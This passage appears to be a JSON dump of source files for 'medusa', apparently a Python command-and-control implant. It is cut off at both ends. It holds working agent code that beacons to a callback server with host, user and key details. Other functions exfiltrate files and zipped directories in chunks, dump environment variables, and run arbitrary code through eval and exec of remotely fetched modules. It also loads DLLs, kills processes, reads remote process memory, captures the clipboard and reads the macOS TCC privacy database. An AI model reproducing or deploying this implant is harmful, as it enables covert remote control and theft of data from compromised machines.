HEADER_PLACEHOLDER,\n            \"Sleep\": callback_interval,\n            \"Jitter\": callback_jitter,\n            \"GetURI\": \"/get_uri\",\n            \"GetParam\": \"query_path_name\",\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/transport_http.py3",
    "content": "### IMPORTS ###\nimport urllib.request\n\n### CLASS_FIELDS ###\n\n### FUNCTIONS ###\n    def postMessageAndRetrieveResponse(self, data):\n        return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data), 'POST')))\n\n    def getMessageAndRetrieveResponse(self, data):\n        return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data, True))))\n\n    def checkIn(self):\n        hostname = socket.gethostname()\n        ip = ''\n        if hostname and len(hostname) > 0:\n            try:\n                ip = socket.gethostbyname(hostname)\n            except:\n                pass\n\n        data = {\n            \"action\": \"checkin\",\n            \"ip\": ip,\n            \"os\": self.getOSVersion(),\n            \"user\": self.getUsername(),\n            \"host\": hostname,\n            \"domain\": socket.getfqdn(),\n            \"pid\": os.getpid(),\n            \"uuid\": self.agent_config[\"PayloadUUID\"],\n            \"architecture\": \"x64\" if sys.maxsize > 2**32 else \"x86\",\n            \"encryption_key\": self.agent_config[\"enc_key\"][\"enc_key\"],\n            \"decryption_key\": self.agent_config[\"enc_key\"][\"dec_key\"]\n        }\n        response_data = self.postMessageAndRetrieveResponse(data)\n        if(\"status\" in response_data):\n            UUID = response_data[\"id\"]\n            self.agent_config[\"UUID\"] = UUID\n            return True\n        else: return False\n\n    def makeRequest(self, data, method='GET'):\n        hdrs = {}\n        for header in self.agent_config[\"Headers\"]:\n            hdrs[header] = self.agent_config[\"Headers\"][header]\n        if method == 'GET':\n            req = urllib.request.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"GetURI\"] + \"?\" + self.agent_config[\"GetParam\"] + \"=\" + data.decode(), None, hdrs)\n        else:\n            req = urllib.request.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"PostURI\"], data, hdrs)\n        #CERTSKIP\n        if self.agent_config[\"ProxyHost\"] and self.agent_config[\"ProxyPort\"]:\n            tls = \"https\" if self.agent_config[\"ProxyHost\"][0:5] == \"https\" else \"http\"\n            handler = urllib.request.HTTPSHandler if tls else urllib.request.HTTPHandler\n            if self.agent_config[\"ProxyUser\"] and self.agent_config[\"ProxyPass\"]:\n                proxy = urllib.request.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config[\"ProxyUser\"], self.agent_config[\"ProxyPass\"], \\\n                        self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                auth = urllib.request.HTTPBasicAuthHandler()\n                opener = urllib.request.build_opener(proxy, auth, handler)\n            else:\n                proxy = urllib.request.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}'.format(tls, self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                opener = urllib.request.build_opener(proxy, handler)\n            urllib.request.install_opener(opener)\n        try:\n            with urllib.request.urlopen(req) as response:\n                out = base64.b64decode(response.read())\n                response.close()\n                return out\n        except: return \"\"\n\n### CONFIG ###\n            \"Server\": \"callback_host\",\n            \"Port\": \"callback_port\",\n            \"PostURI\": \"/post_uri\",\n            \"Headers\": HEADER_PLACEHOLDER,\n            \"Sleep\": callback_interval,\n            \"Jitter\": callback_jitter,\n            \"GetURI\": \"/get_uri\",\n            \"GetParam\": \"query_path_name\",\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/cat.py",
    "content": "    def cat(self, task_id, path):\n        file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        \n        with open(file_path, 'r') as f:\n            content = f.readlines()\n            return ''.join(content)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/cd.py",
    "content": "    def cd(self, task_id, path):\n        if path == \"..\":\n            self.current_directory = os.path.dirname(os.path.dirname(self.current_directory + os.sep))\n        else:\n            self.current_directory = path if path[0] == os.sep \\\n                else os.path.abspath(os.path.join(self.current_directory,path))\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/clipboard.py2",
    "content": "    def clipboard(self, task_id):\n        from Cocoa import NSPasteboard, NSStringPboardType\n        pboard = NSPasteboard.generalPasteboard()\n        pString = pboard.stringForType_(NSStringPboardType)\n        return str(pString).encode('utf8')\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/cp.py",
    "content": "    def cp(self, task_id, source, destination):\n        import shutil\n\n        source_path = source if source[0] == os.sep \\\n                else os.path.join(self.current_directory,source)\n\n        dest_path = destination if destination[0] == os.sep \\\n                else os.path.join(self.current_directory,destination)\n\n        if os.path.isdir(source_path):\n            shutil.copytree(source_path, dest_path)\n        else:\n            shutil.copy(source_path, dest_path)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/cwd.py",
    "content": "    def cwd(self, task_id):\n        return self.current_directory\n        "
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/download.py",
    "content": "    def download(self, task_id, file):\n        file_path = file if file[0] == os.sep \\\n                else os.path.join(self.current_directory,file)\n\n        file_size = os.stat(file_path).st_size \n        total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n\n        data = {\n            \"action\": \"post_response\", \n            \"responses\": [{\n                \"task_id\": task_id,\n                \"download\": {\n                    \"total_chunks\": total_chunks,\n                    \"full_path\": file_path,\n                    \"chunk_size\": CHUNK_SIZE\n                }\n            }]\n        }\n        initial_response = self.postMessageAndRetrieveResponse(data)\n        file_id = initial_response[\"responses\"][0][\"file_id\"]\n        chunk_num = 1\n        with open(file_path, 'rb') as f:\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                content = f.read(CHUNK_SIZE)\n                if not content:\n                    break # done\n\n                data = {\n                    \"action\": \"post_response\", \n                    \"responses\": [\n                        {\n                            \"task_id\": task_id,\n                            \"download\": {\n                                \"chunk_num\": chunk_num,\n                                \"file_id\": file_id,\n                                \"chunk_data\": base64.b64encode(content).decode()\n                            }\n                        }\n                    ]\n                }\n                chunk_num+=1\n                response = self.postMessageAndRetrieveResponse(data)\n        return json.dumps({\n            \"agent_file_id\": file_id\n        })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/download_bulk.py",
    "content": "    def download_bulk(self, task_id, path, mode=\"archive\"):\n            \"\"\"\n            Bulk download files or a directory from the target machine.\n\n            Args:\n                task_id: The task identifier for this operation.\n                path: A file path, directory path, or JSON list of file paths (absolute paths).\n                mode: \"iterative\" to send files one by one, or \"archive\" to bundle into\n                      an in-memory zip and send as a single file (default: \"archive\").\n            \"\"\"\n            import zipfile\n            import io\n\n            # Resolve the list of files to download.\n            # archive_base_dir is used in archive mode to compute relative arcnames that\n            # preserve the original directory structure inside the zip.\n            file_list = []\n            archive_base_dir = None\n\n            # Check if path is a list of files/directories\n            if isinstance(path, list):\n                for p in path:\n                    abs_p = p if os.path.isabs(p) else os.path.join(self.current_directory, p)\n                    if os.path.isdir(abs_p):\n                        for root, dirs, files in os.walk(abs_p):\n                            for fname in files:\n                                file_list.append(os.path.join(root, fname))\n                    else:\n                        file_list.append(abs_p)\n                # Anchor arcnames at the filesystem root so each entry's full path is\n                # preserved inside the archive (e.g. \"etc/nginx/nginx.conf\").\n                archive_base_dir = os.sep\n            elif isinstance(path, str):\n                # Try to parse a JSON list from a string (backward compat)\n                stripped = path.strip()\n                if stripped.startswith(\"[\"):\n                    try:\n                        parsed = json.loads(stripped)\n                        if isinstance(parsed, list):\n                            for f in parsed:\n                                abs_f = f if os.path.isabs(f) else os.path.join(self.current_directory, f)\n                                if os.path.isdir(abs_f):\n                                    for root, dirs, files in os.walk(abs_f):\n                                        for fname in files:\n                                            file_list.append(os.path.join(root, fname))\n                                else:\n                                    file_list.append(abs_f)\n                            archive_base_dir = os.sep\n                        else:\n                            return \"Invalid path value: {}\".format(path)\n                    except Exception as e:\n                        return \"Failed to parse path as JSON list: {} - {}\".format(path, e)\n                else:\n                    # Normalise to absolute path\n                    abs_path = path if os.path.isabs(path) \\\n                        else os.path.join(self.current_directory, path)\n\n                    if os.path.isdir(abs_path):\n                        archive_base_dir = os.path.dirname(abs_path)\n                        for root, dirs, files in os.walk(abs_path):\n                            for fname in files:\n                                file_list.append(os.path.join(root, fname))\n                    elif os.path.isfile(abs_path):\n                        archive_base_dir = os.path.dirname(abs_path)\n                        file_list = [abs_path]\n                    else:\n                        return \"Path does not exist or is not accessible: {}\".format(abs_path)\n            else:\n                return \"Invalid path argument type: {}\".format(type(path))\n\n            if not file_list:\n                return \"No files found to download.\"\n\n            # Cache the task reference once to avoid repeated O(n) lookups inside loops\n            task_ref = [task for task in self.taskings if task[\"task_id\"] == task_id][0]\n\n            results = []\n\n            if mode == \"iterative\":\n                # Download each file individually using the same chunked approach as download()\n                for file_path in file_list:\n                    if task_ref[\"stopped\"]:\n                        return \"Job stopped.\"\n\n                    if not os.path.isfile(file_path):\n                        results.append(\"Skipped (not a file): {}\".format(file_path))\n                        continue\n\n                    file_size = os.stat(file_path).st_size\n                    total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n\n                    data = {\n                        \"action\": \"post_response\",\n                        \"responses\": [{\n                            \"task_id\": task_id,\n                            \"download\": {\n                                \"total_chunks\": total_chunks,\n                                \"full_path\": file_path,\n                                \"chunk_size\": CHUNK_SIZE\n                            }\n                        }]\n                    }\n                    initial_response = self.postMessageAndRetrieveResponse(data)\n                    file_id = initial_response[\"responses\"][0][\"file_id\"]\n                    chunk_num = 1\n\n                    with open(file_path, 'rb') as f:\n                        while True:\n                            if task_ref[\"stopped\"]:\n                                return \"Job stopped.\"\n\n                            content = f.read(CHUNK_SIZE)\n                            if not content:\n                                break\n\n                            data = {\n                                \"action\": \"post_response\",\n                                \"responses\": [{\n                                    \"task_id\": task_id,\n                                    \"download\": {\n                                        \"chunk_num\": chunk_num,\n                                        \"file_id\": file_id,\n                                        \"chunk_data\": base64.b64encode(content).decode()\n                                    }\n                                }]\n                            }\n                            chunk_num += 1\n                            self.postMessageAndRetrieveResponse(data)\n\n                    results.append(json.dumps({\"agent_file_id\": file_id, \"file_path\": file_path}))\n\n                return \"\\n\".join(results)\n\n            else:\n                # Archive mode: build an in-memory zip and send it as a single file.\n                # Directory structure is preserved inside the archive using arcnames\n                # computed relative to archive_base_dir.\n                zip_buffer = io.BytesIO()\n                with zipfile.ZipFile(zip_buffer, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:\n                    for file_path in file_list:\n                        if task_ref[\"stopped\"]:\n                            return \"Job stopped.\"\n\n                        if not os.path.isfile(file_path):\n                            continue\n\n                        # Preserve the original directory structure: compute the path\n                        # relative to archive_base_dir so that sub-directories appear as\n                        # real zip entries (e.g. nginx/conf.d/default.conf) rather than\n                        # flat names with underscores.\n                        arcname = os.path.relpath(file_path, archive_base_dir)\n                        zf.write(file_path, arcname)\n\n                zip_data = zip_buffer.getvalue()\n                zip_buffer.close()\n\n                archive_name = \"download_bulk_{}.zip\".format(task_id)\n                total_chunks = int(len(zip_data) / CHUNK_SIZE) + (len(zip_data) % CHUNK_SIZE > 0)\n\n                data = {\n                    \"action\": \"post_response\",\n                    \"responses\": [{\n                        \"task_id\": task_id,\n                        \"download\": {\n                            \"total_chunks\": total_chunks,\n                            \"full_path\": archive_name,\n                            \"chunk_size\": CHUNK_SIZE\n                        }\n                    }]\n                }\n                initial_response = self.postMessageAndRetrieveResponse(data)\n                file_id = initial_response[\"responses\"][0][\"file_id\"]\n                chunk_num = 1\n                offset = 0\n\n                while offset < len(zip_data):\n                    if task_ref[\"stopped\"]:\n                        return \"Job stopped.\"\n\n                    chunk = zip_data[offset:offset + CHUNK_SIZE]\n                    data = {\n                        \"action\": \"post_response\",\n                        \"responses\": [{\n                            \"task_id\": task_id,\n                            \"download\": {\n                                \"chunk_num\": chunk_num,\n                                \"file_id\": file_id,\n                                \"chunk_data\": base64.b64encode(chunk).decode()\n                            }\n                        }]\n                    }\n                    chunk_num += 1\n                    offset += CHUNK_SIZE\n                    self.postMessageAndRetrieveResponse(data)\n\n                return json.dumps({\"agent_file_id\": file_id})\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/env.py",
    "content": "    def env(self, task_id):\n        return \"\\n\".join([\"{}: {}\".format(x, os.environ[x]) for x in os.environ])\n "
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/eval_code.py",
    "content": "    def eval_code(self, task_id, command):\n        return eval(command)\n        "
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/exit.py",
    "content": "    def exit(self, task_id):\n        os._exit(0)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/jobkill.py",
    "content": "    def jobkill(self, task_id, target_task_id):\n        task = [task for task in self.taskings if task[\"task_id\"] == target_task_id]\n        task[0][\"stopped\"] = True\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/jobs.py",
    "content": "    def jobs(self, task_id):\n        out = [t.name.split(\":\") for t in threading.enumerate() \\\n            if t.name != \"MainThread\" and \"a2m\" not in t.name \\\n            and \"m2a\" not in t.name and t.name != \"jobs:{}\".format(task_id) ]\n        if len(out) > 0: return json.dumps({ \"jobs\": out })\n        else: return \"No long running jobs!\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/kill.py3",
    "content": "    def kill(self, task_id, process_id):\n        import ctypes, ctypes.wintypes\n        from ctypes import GetLastError\n\n        NTSTATUS = ctypes.wintypes.LONG\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n        \n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        TerminateProcess = Kernel32.TerminateProcess\n        TerminateProcess.restype = ctypes.wintypes.BOOL\n\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n        \n        try:\n            hProcess = OpenProcess(PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION, False, process_id)\n            if hProcess:\n                TerminateProcess(hProcess, 1)\n                CloseHandle(hProcess)    \n        except Exception as e:\n            return e\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/list_apps.py2",
    "content": "    def list_apps(self, task_id):\n        import Cocoa\n        app_json = []\n        apps = Cocoa.NSWorkspace.sharedWorkspace().runningApplications()\n        for app in apps:\n            try:\n                app_data = { \"pid\": str(app.processIdentifier()), \"name\": str(app.localizedName()), \"exec_url\": str(app.executableURL()) }\n                app_json.append(app_data)\n            except: pass\n        return json.dumps({ \"apps\": app_json })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/list_dlls.py3",
    "content": "    def list_dlls(self, task_id, process_id=0):\n        import sys, os.path, ctypes, ctypes.wintypes\n        from ctypes import create_unicode_buffer, GetLastError\n        import re\n        import datetime\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n\n        GetCurrentProcess = Kernel32.GetCurrentProcess\n        GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n        GetCurrentProcess.argtypes = ()\n\n        ReadProcessMemory = Kernel32.ReadProcessMemory\n        ReadProcessMemory.errcheck = _check_bool\n        ReadProcessMemory.argtypes = (\n            ctypes.wintypes.HANDLE,\n            ctypes.wintypes.LPCVOID,\n            ctypes.wintypes.LPVOID, \n            SIZE_T,\n            ctypes.POINTER(SIZE_T)) \n\n        # WINAPI Definitions\n        PROCESS_VM_READ           = 0x0010\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ERROR_INVALID_HANDLE = 0x0006\n        ERROR_PARTIAL_COPY   = 0x012B\n\n        WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7\n\n        MAX_PATH = 260\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n\n        class RemotePointer(ctypes._Pointer):\n            def __getitem__(self, key):\n                # TODO: slicing\n                size = None\n                if not isinstance(key, tuple):\n                    raise KeyError('must be (index, handle[, size])')\n                if len(key) > 2:\n                    index, handle, size = key\n                else:\n                    index, handle = key\n                if isinstance(index, slice):\n                    raise TypeError('slicing is not supported')\n                dtype = self._type_\n                offset = ctypes.sizeof(dtype) * index\n                address = PVOID.from_buffer(self).value + offset\n                simple = issubclass(dtype, ctypes._SimpleCData)\n                if simple and size is not None:\n                    if dtype._type_ == ctypes.wintypes.WCHAR._type_:\n                        buf = (ctypes.wintypes.WCHAR * (size // 2))()\n                    else:\n                        buf = (ctypes.c_char * size)()\n                else:\n                    buf = dtype()\n                nread = SIZE_T()\n                Kernel32.ReadProcessMemory(handle,\n                                        address,\n                                        ctypes.byref(buf),\n                                        ctypes.sizeof(buf),\n                                        ctypes.byref(nread))\n                if simple:\n                    return buf.value\n                return buf\n\n        _remote_pointer_cache = {}\n        def RPOINTER(dtype):\n            if dtype in _remote_pointer_cache:\n                return _remote_pointer_cache[dtype]\n            name = 'RP_%s' % dtype.__name__\n            ptype = type(name, (RemotePointer,), {'_type_': dtype})\n            _remote_pointer_cache[dtype] = ptype\n            return ptype\n\n\n        RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)\n\n        class UNICODE_STRING(ctypes.Structure):\n            _fields_ = (('Length',        ctypes.wintypes.USHORT),\n                        ('MaximumLength', ctypes.wintypes.USHORT),\n                        ('Buffer',        RPWSTR))\n\n        class LIST_ENTRY(ctypes.Structure):\n            pass\n\n        RPLIST_ENTRY = RPOINTER(LIST_ENTRY)\n\n        LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),\n                            ('Blink', RPLIST_ENTRY))\n\n        class LDR_DATA_TABLE_ENTRY(ctypes.Structure):\n            _fields_ = (('Reserved1',          PVOID * 2),\n                        ('InMemoryOrderLinks', LIST_ENTRY),\n                        ('Reserved2',          PVOID * 2),\n                        ('DllBase',            PVOID),\n                        ('EntryPoint',         PVOID),\n                        ('Reserved3',          PVOID),\n                        ('FullDllName',        UNICODE_STRING),\n                        ('Reserved4',          ctypes.wintypes.BYTE * 8),\n                        ('Reserved5',          PVOID * 3),\n                        ('CheckSum',           PVOID),\n                        ('TimeDateStamp',      ctypes.wintypes.ULONG))\n\n        RPLDR_DATA_TABLE_ENTRY = RPOINTER(LDR_DATA_TABLE_ENTRY)\n\n        class PEB_LDR_DATA(ctypes.Structure):\n            _fields_ = (('Reserved1',               ctypes.wintypes.BYTE * 8),\n                        ('Reserved2',               PVOID * 3),\n                        ('InMemoryOrderModuleList', LIST_ENTRY))\n\n        RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)\n\n        class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):\n            _fields_ = (('Reserved1',     ctypes.wintypes.BYTE * 16),\n                        ('Reserved2',     PVOID * 10),\n                        ('ImagePathName', UNICODE_STRING),\n                        ('CommandLine',   UNICODE_STRING))\n\n        RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)\n        PPS_POST_PROCESS_INIT_ROUTINE = PVOID\n\n        class PEB(ctypes.Structure):\n            _fields_ = (('Reserved1',              ctypes.wintypes.BYTE * 2),\n                        ('BeingDebugged',          ctypes.wintypes.BYTE),\n                        ('Reserved2',              ctypes.wintypes.BYTE * 1),\n                        ('Reserved3',              PVOID * 2),\n                        ('Ldr',                    RPPEB_LDR_DATA),\n                        ('ProcessParameters',      RPRTL_USER_PROCESS_PARAMETERS),\n                        ('Reserved4',              ctypes.wintypes.BYTE * 104),\n                        ('Reserved5',              PVOID * 52),\n                        ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),\n                        ('Reserved6',              ctypes.wintypes.BYTE * 128),\n                        ('Reserved7',              PVOID * 1),\n                        ('SessionId',              ctypes.wintypes.ULONG))\n\n        RPPEB = RPOINTER(PEB)\n\n        class PROCESS_BASIC_INFORMATION(ctypes.Structure):\n            _fields_ = (('Reserved1',       PVOID),\n                        ('PebBaseAddress',  RPPEB),\n                        ('Reserved2',       PVOID * 2),\n                        ('UniqueProcessId', ULONG_PTR),\n                        ('InheritedFromUniqueProcessId',       ULONG_PTR))\n\n        def NtError(status):\n            import sys\n            descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)\n            if status & 0xC0000000 == 0xC0000000:\n                descr += '[Error]'\n            elif status & 0x80000000 == 0x80000000:\n                descr += '[Warning]'\n            elif status & 0x40000000 == 0x40000000:\n                descr += '[Information]'\n            else:\n                descr += '[Success]'\n            if sys.version_info[:2] < (3, 3):\n                return WindowsError(status, descr)\n            return OSError(None, descr, None, status)\n\n        ntdll = ctypes.WinDLL('ntdll.dll')\n        NtQueryInformationProcess = ntdll.NtQueryInformationProcess\n        NtQueryInformationProcess.restype = NTSTATUS\n        NtQueryInformationProcess.argtypes = (\n            ctypes.wintypes.HANDLE,\n            PROCESSINFOCLASS, \n            PVOID,            \n            ctypes.wintypes.ULONG, \n            PULONG)           \n\n        class ProcessInformation(object):\n            _close_handle = False\n            _closed = False\n            _module_names = None\n\n            def __init__(self, process_id=None, handle=None):\n                if process_id is None and handle is None:\n                    handle = GetCurrentProcess()\n                elif handle is None:\n                    handle = OpenProcess(PROCESS_VM_READ | \n                                            PROCESS_QUERY_INFORMATION,\n                                                False, process_id)\n                    self._close_handle = True\n                self._handle = handle\n                self._query_info()\n                if process_id is not None and not self._ldr:\n                    return\n\n            def __del__(self, CloseHandle=CloseHandle):\n                if self._close_handle and not self._closed:\n                    try:\n                        CloseHandle(self._handle)\n                    except WindowsError as e:\n                        pass\n                    self._closed = True\n\n            def _query_info(self):\n                info = PROCESS_BASIC_INFORMATION()\n                handle = self._handle\n                status = NtQueryInformationProcess(handle,\n                                                ProcessBasicInformation,\n                                                ctypes.byref(info),\n                                                ctypes.sizeof(info),\n                                                None)\n                if status < 0:\n                    raise NtError(status)\n\n                self._peb = peb = info.PebBaseAddress[0, handle]\n                self._ldr = peb.Ldr[0, handle]\n\n            def _modules_iter(self):\n                headaddr = (PVOID.from_buffer(self._peb.Ldr).value +\n                            PEB_LDR_DATA.InMemoryOrderModuleList.offset)\n                offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset\n                pentry = self._ldr.InMemoryOrderModuleList.Flink\n                while pentry:\n                    pentry_void = PVOID.from_buffer_copy(pentry)\n                    if pentry_void.value == headaddr:\n                        break\n                    pentry_void.value -= offset\n                    pmod = RPLDR_DATA_TABLE_ENTRY.from_buffer(pentry_void)\n                    mod = pmod[0, self._handle]\n                    yield mod\n                    pentry = LIST_ENTRY.from_buffer(mod, offset).Flink\n\n            def update_module_names(self):\n                names = []\n                for m in self._modules_iter():\n                    ustr = m.FullDllName\n                    name = ustr.Buffer[0, self._handle, ustr.Length]\n                    names.append(name)\n                self._module_names = names\n\n            @property\n            def module_names(self):\n                if self._module_names is None:\n                    self.update_module_names()\n                return self._module_names\n\n        try:\n            if not process_id:\n                pi = ProcessInformation()\n            else:\n                pi = ProcessInformation(process_id)\n            return json.dumps({ \"dlls\": pi.module_names })\n        except Exception as e:\n            return e"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/list_modules.py",
    "content": "    def list_modules(self, task_id, module_name=\"\"):\n        if module_name:\n            if module_name in self.moduleRepo.keys():\n                return \"\\n\".join(self.moduleRepo[module_name].namelist())\n            else: return \"{} not found in loaded modules\".format(module_name)\n        else:\n            return \"\\n\".join(self.moduleRepo.keys())\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/list_tcc.py",
    "content": "    def list_tcc(self,task_id,tcc=True, db=\"/Library/Application Support/com.apple.TCC/TCC.db\"):\n        import sqlite3\n\n        with sqlite3.connect(db) as con:\n            columns = []\n            for row in con.execute('PRAGMA table_info(\"access\")'):\n                columns.append(row)\n\n            tcc = []\n            for row in con.execute('SELECT * FROM \"access\"'):\n                tcc.append(row)\n            results = []\n            for entry in tcc:\n                line={}\n                count = 0 \n                for ent in entry:\n                    if columns[count][2] == \"BLOB\" and ent != None:\n                        line[columns[count][1]] = base64.b64encode(ent).decode()\n                    else: line[columns[count][1]] = str(ent)\n                    count+=1\n                results.append(line)\n\n            tcc_results = {}\n            tcc_results[\"entries\"] = results\n            return json.dumps({ \"tcc\": results })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load.py",
    "content": "    def load(self, task_id, file_id, command):\n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file_id, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n\n        if cmd_code:\n            exec(cmd_code.replace(\"\\n    \",\"\\n\")[4:])\n            setattr(medusa, command, eval(command))\n            cmd_list = [{\"action\": \"add\", \"cmd\": command}]\n            responses = [{ \"task_id\": task_id, \"user_output\": \"Loaded command: {}\".format(command), \"commands\": cmd_list, \"completed\": True }]\n            message = { \"action\": \"post_response\", \"responses\": responses }\n            response_data = self.postMessageAndRetrieveResponse(message)\n        else: return \"Failed to upload '{}' command\".format(command)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load_dll.py",
    "content": "    def load_dll(self, task_id, dllpath, dllexport):\n        from ctypes import WinDLL\n        dll_file_path = dllpath if dllpath[0] == os.sep \\\n                else os.path.join(self.current_directory,dllpath)\n        loaded_dll = WinDLL(dll_file_path)\n        eval(\"{}.{}()\".format(\"loaded_dll\",dllexport))\n        return \"[*] {} Loaded.\".format(dllpath)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load_module.py2",
    "content": "    def load_module(self, task_id, file, module_name):\n        import zipfile, io\n        class CFinder(object):\n            def __init__(self, repoName, instance):\n                self.moduleRepo = instance.moduleRepo\n                self.repoName = repoName\n                self._source_cache = {}\n\n            def _get_info(self, repoName, fullname):\n                parts = fullname.split('.')\n                submodule = parts[-1]\n                modulepath = '/'.join(parts)\n                _search_order = [('.py', False), ('/__init__.py', True)]\n                for suffix, is_package in _search_order:\n                    relpath = modulepath + suffix\n                    try: self.moduleRepo[repoName].getinfo(relpath)\n                    except KeyError: pass\n                    else: return submodule, is_package, relpath\n                msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))\n                raise ImportError(msg)\n\n            def _get_source(self, repoName, fullname):\n                submodule, is_package, relpath = self._get_info(repoName, fullname)\n                fullpath = '%s/%s' % (repoName, relpath)\n                if relpath in self._source_cache:\n                    source = self._source_cache[relpath]\n                    return submodule, is_package, fullpath, source\n                try:\n                    source =  self.moduleRepo[repoName].read(relpath)\n                    source = source.replace(b'\\r\\n', b'\\n')\n                    source = source.replace(b'\\r', b'\\n')\n                    self._source_cache[relpath] = source\n                    return submodule, is_package, fullpath, source\n                except: raise ImportError(\"Unable to obtain source for module %s\" % (fullpath))\n\n            def find_module(self, fullname, path=None):\n                try: submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                except ImportError: return None\n                else: return self\n\n            def load_module(self, fullname):\n                import imp\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                code = compile(source, fullpath, 'exec')\n                mod = sys.modules.setdefault(fullname, imp.new_module(fullname))\n                mod.__loader__ = self\n                mod.__file__ = fullpath\n                mod.__name__ = fullname\n                if is_package: mod.__path__ = [os.path.dirname(mod.__file__)]\n                exec code in mod.__dict__\n                return mod\n\n            def get_data(self, fullpath):\n                prefix = os.path.join(self.repoName, '')\n                if not fullpath.startswith(prefix):\n                    raise IOError('Path %r does not start with module name %r', (fullpath, prefix))\n                relpath = fullpath[len(prefix):]\n                try: return self.moduleRepo[self.repoName].read(relpath)\n                except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))\n\n            def is_package(self, fullname):\n                \"\"\"Return if the module is a package\"\"\"\n                submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                return is_package\n\n            def get_code(self, fullname):\n                submodule, is_package, 